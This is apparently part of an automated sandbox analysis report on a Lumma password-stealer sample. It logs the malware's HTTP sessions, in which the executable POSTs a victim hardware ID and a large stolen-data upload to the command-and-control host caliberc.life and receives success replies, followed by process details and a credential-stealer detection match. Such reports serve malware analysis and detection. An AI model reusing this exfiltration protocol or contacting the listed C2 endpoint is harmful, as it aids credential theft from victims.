                                                                          2025-03-17 03:17:10 UTC5055OUTData Raw: 46 21 2b df 47 3b 6f 18 24 cd 7c b2 bf 97 bc 62 64 ce 07 51 2a b5 b0 c4 ce 41 34 85 76 c1 de 61 d8 d6 af 59 be 20 7e e4 12 f3 cf 47 7f 44 f2 1c 4c cc 5b c7 4d a4 f6 53 31 5c 62 4d 00 d9 82 8a ee 22 b2 9d df d2 fb 1f 31 c4 8b e1 a0 2e 64 da e1 80 99 45 ce 35 7f 23 78 5c a6 13 46 a3 a0 ca 98 26 82 68 b3 3f 8f 9c 32 bb d1 80 0b 91 16 82 38 99 57 1f 82 71 1c 13 be 58 0b bb ca 6a 8b 81 37 2b ac ec c4 25 fb 9d 45 4b 4b 7e 6d ee 28 b5 e1 86 4f 54 73 d8 48 f7 cc 94 c4 62 1e a3 9a 83 73 d3 81 1f d1 83 19 df a4 f7 1f fc e8 7a db 76 9d 73 f6 da 60 16 74 00 2e 60 5b 6c 6a f4 73 ca ae 0a e5 da 96 e2 4f 52 c7 53 6c 96 40 aa 32 8d 95 09 26 0a f5 b5 7d 02 e0 60 a7 03 8c ed f7 bc 3d 78 82 dc f1 31 54 ea da 37 09 6f 48 86 3a 98 91 d6 c4 c4 07 c2 fb 01 6f f9 c5 32 3d 6b fc
                                                                          Data Ascii: F!+G;o$|bdQ*A4vaY ~GDL[MS1\bM"1.dE5#x\F&h?28WqXj7+%EKK~m(OTsHbszvs`t.`[ljsORSl@2&}`=x1T7oH:o2=k
                                                                          2025-03-17 03:17:11 UTC805INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:11 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FJqdm3WqI8waWAimxgTHHtVjzckH0EGoeWAdoymdTp5jic6sx7PoyaV9yJOOqySVH3Xkieb1hGWq7k7nligmmwymHCDv2L%2FSjKL4zqdCCrwwFpQYHyAZTMO%2BidM5gdz7"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 921955f77d3a0ca2-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1455&rtt_var=563&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2828&recv_bytes=21342&delivery_rate=1912246&cwnd=82&unsent_bytes=0&cid=d0d1f9d195818028&ts=572&x=0"
                                                                          2025-03-17 03:17:11 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                          Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                          2025-03-17 03:17:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.449727104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:12 UTC276OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=ih7gw2mPn19x
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 2517
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:12 UTC2517OUTData Raw: 2d 2d 69 68 37 67 77 32 6d 50 6e 31 39 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 0d 0a 2d 2d 69 68 37 67 77 32 6d 50 6e 31 39 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 69 68 37 67 77 32 6d 50 6e 31 39 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 37 46 32 38 43 46 33 31 38 39 41 35 43 46 41 39 38 30 34 39 31 30 39 39 43 45 30 37
                                                                          Data Ascii: --ih7gw2mPn19xContent-Disposition: form-data; name="uid"5498393c4e466c6938062c5bd4da787c--ih7gw2mPn19xContent-Disposition: form-data; name="pid"1--ih7gw2mPn19xContent-Disposition: form-data; name="hwid"C687F28CF3189A5CFA980491099CE07
                                                                          2025-03-17 03:17:12 UTC811INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJf2ZXO8Kk%2B3Vl2DJDgqiqAeQ%2BtJ2In%2BO2Dfhw8C4lITBFMPsjWIxDXX8COqB9cF%2BTSGZ2ZUR50JXoWypFNul9jmvAxcPcefIqrBsm%2FK2SdfP1jcPrXugef%2BOCwZxgF6"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 921956009facf797-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1701&rtt_var=850&sent=7&recv=10&lost=0&retrans=1&sent_bytes=4198&recv_bytes=3429&delivery_rate=120318&cwnd=206&unsent_bytes=0&cid=0bbd08b6f66cdc33&ts=443&x=0"
                                                                          2025-03-17 03:17:12 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                          Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                          2025-03-17 03:17:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.449728104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:13 UTC281OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=UvC1356PGpKs0dR
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 551744
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 2d 2d 55 76 43 31 33 35 36 50 47 70 4b 73 30 64 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 0d 0a 2d 2d 55 76 43 31 33 35 36 50 47 70 4b 73 30 64 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 76 43 31 33 35 36 50 47 70 4b 73 30 64 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 37 46 32 38 43 46 33 31 38 39 41 35 43 46 41 39 38 30 34
                                                                          Data Ascii: --UvC1356PGpKs0dRContent-Disposition: form-data; name="uid"5498393c4e466c6938062c5bd4da787c--UvC1356PGpKs0dRContent-Disposition: form-data; name="pid"1--UvC1356PGpKs0dRContent-Disposition: form-data; name="hwid"C687F28CF3189A5CFA9804
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 63 0a 9a 0e 92 03 b0 99 a6 14 ac 5b 3f 80 2b 0f 7c 15 e2 ca 18 ef aa bb 7b 7d 88 d1 90 1f bd 28 ee 05 c8 8e 89 85 70 af b8 92 87 96 75 d4 77 a8 30 d0 f1 ec 11 45 d5 7a 25 3d ed a9 ad e0 f6 f1 11 60 c4 21 c6 b7 04 cb 6a 10 25 98 78 67 eb d4 b1 0e f4 c4 be 91 2b 7e 41 c2 d9 4e 12 90 9d 3b 5e 65 f7 7a a6 73 e2 22 2c a0 1b 08 96 c2 72 cf dc 3f 36 17 36 5b 64 1a 9b 39 e6 57 24 51 62 ed d0 fb 70 c2 a3 b0 c7 a4 9c 56 0a f8 b6 2e ed a5 ad f2 3a 6d 7f cf 48 51 87 73 f8 b2 4e eb af 65 dc be 85 c5 f4 84 40 de 23 d9 38 c9 7a 04 55 2a af fc f3 7b 54 1a 6d 11 11 b0 e2 0c 15 67 f7 7b c7 02 fa dc 08 b9 40 7e 18 f9 b2 b4 76 0a 66 0f 4d 48 58 e5 da 5f 24 19 40 14 af 09 c6 0b 3e 55 44 b7 58 e2 d0 68 ca 6e 77 b6 9a bf ad ba 37 c6 32 96 e0 a2 36 dc 1a ac 1a e1 f0 40 28 73 69
                                                                          Data Ascii: c[?+|{}(puw0Ez%=`!j%xg+~AN;^ezs",r?66[d9W$QbpV.:mHQsNe@#8zU*{Tmg{@~vfMHX_$@>UDXhnw726@(si
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: d1 6f 93 e0 49 31 a6 36 1f 0a 4a d0 52 87 e6 ac b9 42 e7 0f 98 7b d1 96 24 50 42 62 ac 2f 80 5e b7 eb e3 2c 56 42 8c 20 0e 32 c7 dd 27 c6 27 d0 1f 01 99 83 bb 85 f8 a0 6a ec 49 9d 7d 93 cb c0 46 0f 8e 05 94 52 4d 6b e2 4c 5a 4b c9 2f 10 d0 b0 ad 7e ab c9 a7 e8 4d d5 c5 56 b5 77 c9 94 e5 b8 05 7b cd da cd cb 93 f5 8f b6 38 ce 15 cc a8 d9 74 3a 7e 5c 8c 42 e0 c9 1f 40 ac 0b fc 2f 1a b8 cd 3b 10 ed a2 0e 96 2d 01 56 77 00 d7 07 91 81 0f e0 c9 18 72 d2 d8 86 0f 55 35 4f 26 30 8e f0 da 5d bb 41 25 3f a2 d0 51 c8 cf b9 0a c2 fe b5 61 92 25 34 49 ee 20 b0 82 9c 54 52 85 d3 75 ec 03 4c 34 68 51 2f fb 51 a9 08 75 17 89 27 d7 24 d1 c8 47 6b 69 53 00 1b 84 8d 98 0b 34 e9 98 1b b5 10 b0 33 21 e1 19 4e b1 61 15 f0 88 6d 49 c5 fc 74 b8 ce 0d 93 ac 1d 0f 0e cb 4e 5e 19
                                                                          Data Ascii: oI16JRB{$PBb/^,VB 2''jI}FRMkLZK/~MVw{8t:~\B@/;-VwrU5O&0]A%?Qa%4I TRuL4hQ/Qu'$GkiS43!NamItN^
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 10 4b c1 5a a7 4e 8b a1 33 7a 0e c8 20 b7 48 a6 71 35 18 49 6b 55 95 dc e6 d5 1e 8c 79 38 da 14 20 e0 a3 3a 01 d6 63 c9 63 25 3e de 0a d2 a3 7b e1 09 59 0a 03 89 0d e3 31 c5 b9 7c c5 1e 4c 1b 35 1c 75 e9 d2 7c 13 11 6e 13 99 cf c7 73 bb 57 e7 b5 cf 05 e7 94 e3 ab 32 79 11 04 e3 32 e4 8f 46 34 c1 39 25 f9 15 d5 0b 3b c0 b5 5d b3 52 86 ac 60 ba 8c d0 00 6f c3 68 5f 9a b8 b2 72 c1 49 b2 50 25 77 12 01 84 d6 a1 e9 9c c6 11 51 0d f4 82 bf 15 15 32 0d 46 0e f2 1e 28 79 c6 d5 e3 a4 58 c4 ea d4 52 5a 8b a4 cc e7 97 2f b9 72 7a 2f dc 38 48 ba 38 49 ac 5d 88 13 45 72 41 9c 4f 4a 51 45 76 00 b0 8f 96 df 0d a1 b0 08 11 8a 37 40 a0 d8 e4 49 b2 ac bd 40 5a ef 4d a0 3a 67 a0 68 c1 e2 02 0b 35 e7 39 18 92 21 38 89 c9 34 51 16 4b 90 bb 7f 08 4b 0f 23 f3 8b 63 4a ad 89 71
                                                                          Data Ascii: KZN3z Hq5IkUy8 :cc%>{Y1|L5u|nsW2y2F49%;]R`oh_rIP%wQ2F(yXRZ/rz/8H8I]ErAOJQEv7@I@ZM:gh59!84QKK#cJq
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: a8 66 19 00 a0 0e 3f 13 9d 41 10 1e ee 6a ec 0c 14 62 94 88 50 a6 9f 68 e8 7d 12 0b b1 c5 f9 fe 32 df 67 de ac 53 32 f0 98 b9 c0 a0 49 fa 3d 72 70 75 65 b2 fd ad d4 82 75 0a ba 61 da 93 ec 4a 55 51 b4 d7 0f 99 dc aa e2 a7 e0 7d 9f 6e 5c 86 ac 10 74 91 e9 f6 54 2f 96 a7 bf 79 97 1a 01 46 34 04 1e e8 23 b2 a4 ad b1 c7 43 66 b4 44 08 7e cc c1 60 cd 46 1f 8a 84 69 eb 4c 0f 26 f0 0f 6c 7b a6 52 e5 e9 f2 3a 7a d1 9e c6 2a ab f2 4d 03 eb 01 1a ed 18 e1 42 b2 99 a4 a4 b7 4c e1 33 fb 76 53 ca 69 28 90 20 24 3d e3 dd 97 d4 b4 00 3d f8 f3 12 1d bd 0c cc 35 82 f3 ad 15 73 c7 d0 40 6e 72 a2 cd 6a 56 a8 21 2f 2d e5 b9 33 0d 27 3d 85 b2 41 e2 0a 30 2f 9e 57 cb a9 08 86 52 c3 15 9f 75 0d 75 e3 fb 54 65 6c 15 94 6e 42 d7 a4 eb dc 6b 71 21 22 85 aa 2b 3d 8f 03 2e e4 c3 5d
                                                                          Data Ascii: f?AjbPh}2gS2I=rpueuaJUQ}n\tT/yF4#CfD~`FiL&l{R:z*MBL3vSi( $==5s@nrjV!/-3'=A0/WRuuTelnBkq!"+=.]
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 93 e1 48 10 75 2e 52 e1 92 64 6f 40 f3 18 b9 26 00 cd 3a 93 13 6b 7d 64 58 3b 63 d3 cf 8d 1e e4 58 0e a9 08 71 fa 95 92 fa 09 8a 74 50 fe 76 6c 08 00 50 d6 80 1c ca bb e1 77 7b d1 42 09 b7 22 5e 06 21 d8 ce 38 e8 c8 63 b0 40 6e 59 ed 3c a0 b2 98 5e 97 e6 55 57 50 4a fd 4b 29 4b 85 52 85 a5 d9 4e 43 62 f0 95 a5 7d 18 49 48 6f b2 fc 0a 3d 9e df 36 0e 76 ff 7d a4 9c 08 85 e1 25 36 0b ca 40 dd 6e 7b 69 e0 69 30 c5 e5 13 73 f8 ae e8 f0 7d 89 5a 69 dc d0 b5 f0 19 a4 98 87 53 3e c1 54 40 3f 96 b4 79 9d a2 68 72 bb c6 13 ee 0a 2c f4 e3 c2 97 88 70 50 a7 d9 ef d3 fe d6 67 ab 41 37 9c 9f ec 61 44 3c 58 d8 ec 12 83 2f a8 6e 8c 78 01 c0 e4 b7 f2 cc 5d 5c 84 7e 01 dd 39 dc e7 c0 54 f6 72 44 7e 08 09 09 42 0a 14 b5 9b b1 2c 9b f4 0e 42 a1 86 d2 3a e6 d2 5e 95 92 b5 7e
                                                                          Data Ascii: Hu.Rdo@&:k}dX;cXqtPvlPw{B"^!8c@nY<^UWPJK)KRNCb}IHo=6v}%6@n{ii0s}ZiS>T@?yhr,pPgA7aD<X/nx]\~9TrD~B,B:^~
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 7e 29 a8 35 f4 49 13 b5 cc 83 2d 30 fc 78 e1 73 5c f2 5e 1d 25 16 9a 52 3a 48 8a 8c ba 06 a0 e4 cc 76 be a3 d4 a4 62 cb 34 cd 4c 91 fb 8e ee cf 67 aa 49 73 32 dc 95 c2 73 f0 e0 6e 45 18 f1 9d a5 d1 c4 eb d2 44 aa 39 d3 70 ab 9b 09 ea 74 d5 ec fc 46 39 53 4a 39 53 72 f8 d1 72 cf 21 98 8c 80 f4 1f c4 ee 03 80 5b 7d 8e 9c 49 0d 1c 11 28 93 47 20 53 a3 ec a2 3d 3a c9 c3 27 a7 72 02 03 22 b7 bd 1c 43 0f 73 8e 67 4a 74 02 3c e0 59 e8 9e ec 86 cf d3 52 7c 3e 3a e4 99 2e 87 51 c6 e6 c0 e0 b3 84 1b b2 68 c1 f9 37 a5 25 e3 5d b9 fe 89 a6 15 91 5b 91 b0 39 ce 42 01 ec 34 1e b7 6b e1 bb aa cd 55 36 2e 62 43 f7 9f 16 b9 f5 3e 6d 5a a0 7e e3 2c 31 85 e5 a0 eb ae 61 ff 0a 1f 56 28 82 95 05 7d 83 dc 50 30 e7 41 91 e3 04 ec e9 89 b8 03 e4 ec df 7f 25 ba 75 3a f1 0e 71 f7
                                                                          Data Ascii: ~)5I-0xs\^%R:Hvb4LgIs2snED9ptF9SJ9Srr![}I(G S=:'r"CsgJt<YR|>:.Qh7%][9B4kU6.bC>mZ~,1aV(}P0A%u:q
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 04 b3 de 69 3b b8 5c 81 c4 c1 e2 01 67 10 a7 da 25 8c 7f 21 8a 85 2c 03 cf 90 27 ec ce eb b0 b1 62 5c 64 fc 44 1e f2 b6 2e e4 32 a8 3d 6c 5c c8 d3 f9 60 d7 d1 c7 bf eb 9c 30 32 ca d9 b2 04 b9 80 d7 a9 cb 20 25 00 fa 1f 52 d0 2d 5d f9 d4 32 4f 4d d8 49 8d e9 53 c0 91 ad 65 6a 75 55 8b 78 37 eb 6a ed 04 88 da c6 eb 0b 91 f2 b9 39 10 8d 64 25 53 6d 4b 96 d6 7e 80 1c e0 1c af 00 f5 6a 11 2f 5b 00 41 75 07 27 c5 b5 bb 26 65 f9 f3 f3 86 2c 5a 5c 13 7f db 93 4d 32 2b f7 7c 91 51 2e 65 b0 97 b8 40 59 2f 54 95 da d3 1f 8f 48 54 75 77 9a cf da ea 7b 7a e9 2a fd 49 f7 e1 a5 f8 f4 92 df 9b 07 c5 a1 ff 2b 39 f3 d2 f1 ed 08 f7 15 9c f4 37 6e c6 1d 45 42 5c ab 7e 11 30 de 2f 3b 72 05 9c 4d 86 2c af 17 ca 1e 03 f1 51 46 e6 2f f0 3c c7 f3 66 b2 cc 3a 42 b6 df 0a 39 66 b8
                                                                          Data Ascii: i;\g%!,'b\dD.2=l\`02 %R-]2OMISejuUx7j9d%SmK~j/[Au'&e,Z\M2+|Q.e@Y/THTuw{z*I+97nEB\~0/;rM,QF/<f:B9f
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: ff 8e cb 6b 8d 01 09 63 3d ee 42 8b 75 0b 47 c3 f1 57 0e 0b 77 51 11 75 9b ae 58 a0 43 16 41 70 15 b2 08 17 18 2a cc c3 7c 81 34 03 32 e3 3b 04 60 3c e6 eb 45 76 67 8b 5d e3 f2 5e b2 ad b3 34 d3 71 d5 62 6f 95 ec e0 f9 a0 9b e2 51 99 59 f9 86 10 29 12 06 0c 90 9a b5 88 85 76 bd a8 40 46 59 fb 2d b7 90 a2 70 8f 2e 6f cc 3d 0b d1 41 3d 27 30 a2 a3 dc 84 f5 28 6b 3d 7c 9d 0e bc d0 21 c3 6b ce 98 f7 3c 0e eb 44 6f a4 cd ed 3a 5d 8a d8 3a 0e 00 de d7 a7 40 e7 76 39 10 1c dd 05 40 10 07 39 2d 38 e5 eb 3b aa f7 cf 98 91 76 e7 11 0f 32 7f 36 d4 67 de f2 cd 71 ae cb 32 79 6e 65 0a 9c 96 ef 25 81 80 e7 35 24 f0 a4 4f d9 44 5d 4d 81 15 27 b5 45 6c 17 15 4b 8a 81 af dd 61 a5 43 77 54 1e 8a b2 fb 71 2a 3f f7 d9 b4 41 c8 7d 35 07 49 14 e1 fc 11 2c 82 99 db 07 83 ac b7
                                                                          Data Ascii: kc=BuGWwQuXCAp*|42;`<Evg]^4qboQY)v@FY-p.o=A='0(k=|!k<Do:]:@v9@9-8;v26gq2yne%5$OD]M'ElKaCwTq*?A}5I,
                                                                          2025-03-17 03:17:13 UTC15331OUTData Raw: 29 70 81 c1 6e 19 6a cc 8b 9a f0 cc ae 09 7c 7e 36 20 c7 70 d0 30 05 b9 85 3e 04 53 9b b1 70 ff 2b 90 67 6a 4d cb 48 3f b0 37 71 77 19 1f 47 1e 5a 09 e2 75 c7 68 5d 99 20 3e 29 e8 53 1d 7a 84 65 f7 3b 2b 01 a5 1a e9 be 5b 76 62 1d 21 85 d3 c6 e0 90 1c 6b ee d1 7f a6 6f a6 9b e5 cc bb 8e 8c 1f b5 f6 97 46 2d b0 11 55 60 02 cf 9a 0d 8e ba 15 44 53 9c d0 a5 a0 6c 3e d6 cf 81 56 af e0 6b 15 4b fd 6b 67 ea ff 3f 74 0b fb f2 b1 ea d5 d8 90 17 31 71 e6 1c 9c 7c 16 f2 88 97 33 10 f7 a6 bb 59 bc 58 77 6e 91 ff a1 77 24 91 c8 b6 6e 36 fa 0e 0b d6 cd c6 89 17 d4 ba 71 ed cd e1 1d 9b de 7c bd 53 e8 d8 99 f4 d8 ed fb 27 81 cd 9e 38 6b 3d 9d 4b ae a1 2d 01 c4 bb 4f ec 0a ba 09 e0 af 7e 42 2a 70 45 69 cb f5 48 42 39 45 d9 f9 d4 56 58 04 a2 04 9c be f5 9a c2 7c 84 a1 dc
                                                                          Data Ascii: )pnj|~6 p0>Sp+gjMH?7qwGZuh] >)Sze;+[vb!koF-U`DSl>VkKkg?t1q|3YXwnw$n6q|S'8k=K-O~B*pEiHB9EVX|
                                                                          2025-03-17 03:17:15 UTC272INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:15 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          Vary: Accept-Encoding
                                                                          Cf-Cache-Status: DYNAMIC
                                                                          CF-RAY: 92195608b9b1aa2a-EWR
                                                                          alt-svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.449731104.21.48.14437872C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-17 03:17:16 UTC265OUTPOST /sjASHya HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 79
                                                                          Host: caliberc.life
                                                                          2025-03-17 03:17:16 UTC79OUTData Raw: 75 69 64 3d 35 34 39 38 33 39 33 63 34 65 34 36 36 63 36 39 33 38 30 36 32 63 35 62 64 34 64 61 37 38 37 63 26 63 69 64 3d 26 68 77 69 64 3d 43 36 38 37 46 32 38 43 46 33 31 38 39 41 35 43 46 41 39 38 30 34 39 31 30 39 39 43 45 30 37 36
                                                                          Data Ascii: uid=5498393c4e466c6938062c5bd4da787c&cid=&hwid=C687F28CF3189A5CFA980491099CE076
                                                                          2025-03-17 03:17:16 UTC771INHTTP/1.1 200 OK
                                                                          Date: Mon, 17 Mar 2025 03:17:16 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HS19RJePgd89LoPf9yvHSL0AYHLzwTNNWbDYv6GE3Ip%2F8RKjfDSSWZQixyGRW9XeEWmD5YmVy1Ec5Kljz3vyEoYxLeidwFi%2Bc0epgE2YG5OfsWzIdFC6kQ28DlRDAIl8"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 921956182e4025d8-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2041&min_rtt=2030&rtt_var=783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=980&delivery_rate=1378008&cwnd=206&unsent_bytes=0&cid=9ad013393d29db34&ts=438&x=0"
                                                                          2025-03-17 03:17:16 UTC43INData Raw: 21 62 37 f7 47 4e cb 28 58 b9 d1 20 36 df 79 47 7b b1 d8 e3 ab 8a 79 66 1d f9 22 06 4b eb 63 30 6d cc 33 d7 a7 fa 18 f9 a1 5e 2f
                                                                          Data Ascii: !b7GN(X 6yG{yf"Kc0m3^/


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Target ID:0
                                                                          Start time:23:17:04
                                                                          Start date:16/03/2025
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe"
                                                                          Imagebase:0xd90000
                                                                          File size:1'315'328 bytes
                                                                          MD5 hash:F30E34C685FE30CD96083E650FCB70F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Borland Delphi
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Reset < >